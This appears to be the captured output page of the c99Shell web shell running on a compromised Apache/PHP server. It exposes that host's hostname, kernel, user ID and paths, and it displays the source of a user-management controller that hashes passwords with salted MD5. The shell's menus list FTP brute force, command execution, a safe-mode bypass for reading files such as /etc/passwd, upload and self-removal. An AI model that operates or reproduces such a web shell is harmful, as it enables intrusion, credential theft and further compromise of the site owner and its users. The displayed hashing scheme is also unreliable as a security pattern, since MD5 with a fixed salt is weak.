!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/stdalumni/application/controllers/ums/   drwxr-xr-x
Free 50.66 GB of 127.8 GB (39.64%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user.php (2.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require("ums_controller.php");
class 
User extends Ums_controller {
    public 
$data;
    function 
index(){
        
$this->load->model($this->config->item("ums_folder")."m_umuser","m_umuser");
        
$m_umuser $this->m_umuser;
        
$this->data["user"] = $m_umuser->getAll()->result();
        
$this->output("v_umUserShow");
    }
    
    
/*
    * Add User
    * @author    beeroma
    * @Create Date 2554-10-28
    */
    
function umUserAdd(){
        if(
$this->input->post("submit")){ //SAVE
            
$this->load->model($this->config->item("ums_folder")."m_umuser","m_umuser");
            
$m_umuser $this->m_umuser;
            
$m_umuser->UsName         trim($this->input->post("UsName"));
            
$m_umuser->UsLogin         trim($this->input->post("UsLogin"));
            
$m_umuser->UsPassword     md5("O]O" trim($this->input->post("UsPassword")) . "O[O");
            
$m_umuser->UsPsCode     trim($this->input->post("UsPsCode"));
            
$m_umuser->UsWgID         trim($this->input->post("UsWgID"));
            
$m_umuser->UsQsID         trim($this->input->post("UsQsID"));
            
$m_umuser->UsAnswer     trim($this->input->post("UsAnswer"));
            
$m_umuser->UsEmail         trim($this->input->post("UsEmail"));
            
// Active
            
$UsActive trim($this->input->post("UsActive"));
            if(
$UsActive == "on"){
                
$m_umuser->UsActive 1;
            } else {
                
$m_umuser->UsActive 0;
            }
            
// Admin
            
$UsAdmin trim($this->input->post("UsAdmin"));
            if(
$UsAdmin == "on"){
                
$m_umuser->UsAdmin 1;
            } else {
                
$m_umuser->UsAdmin 0;
            }
            
$m_umuser->UsDesc         trim($this->input->post("UsDesc"));
            
$m_umuser->UsPwdExpDt     trim($this->input->post("UsPwdExpDt"));
            
$m_umuser->UsUpdDt         trim($this->input->post("UsUpdDt"));
            
$m_umuser->UsUpdUsID     trim($this->input->post("UsUpdUsID"));
            
$m_umuser->UsSessionID     trim($this->input->post("UsSessionID"));
            
$m_umuser->insert();
            
$url site_url()."/".$this->config->item("ums_folder")."user";
            
redirect_post($url);
        } else {
            
//umwgroup
            
$this->load->model($this->config->item("ums_folder")."m_umwgroup","m_umwgroup");
            
$umwgroup $this->m_umwgroup;
            
$this->data["options_umwgroup"] = $umwgroup->get_options();
            
            
//umquestion
            
$this->load->model($this->config->item("ums_folder")."m_umquestion","m_umquestion");
            
$umquestion $this->m_umquestion;
            
$this->data["options_umquestion"] = $umquestion->get_options();
            
            
//umgroup
            
$this->load->model($this->config->item("ums_folder")."m_umgroup","m_umgroup");
            
$umgroup $this->m_umgroup;
            
$this->data["options_umgroup"] = $umgroup->get()->result();
            
            
$this->output("v_umUserForm");
        }
    }
    
    
/*
    * Check UsLogin and UsPsCode
    * @author    beeroma
    * @Create Date 2554-10-28
    */
    
function checkUserAdd(){
        
// UsLogin
        
$UsLogin $this->input->post("UsLogin");
        if(
$UsLogin != ""){
            
$option["UsLogin"] = $UsLogin;
        }
        
        
// UsPsCode
        
$UsPsCode $this->input->post("UsPsCode");
        if(
$UsPsCode != ""){
            
$option["UsPsCode"] = $UsPsCode;
        }
        
        
$this->load->model($this->config->item("ums_folder")."m_umuser","m_umuser");
        
$m_umuser $this->m_umuser;
        echo 
$this->data["user"] = $m_umuser->checkUserAdd($option);
    }
}
// End file

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--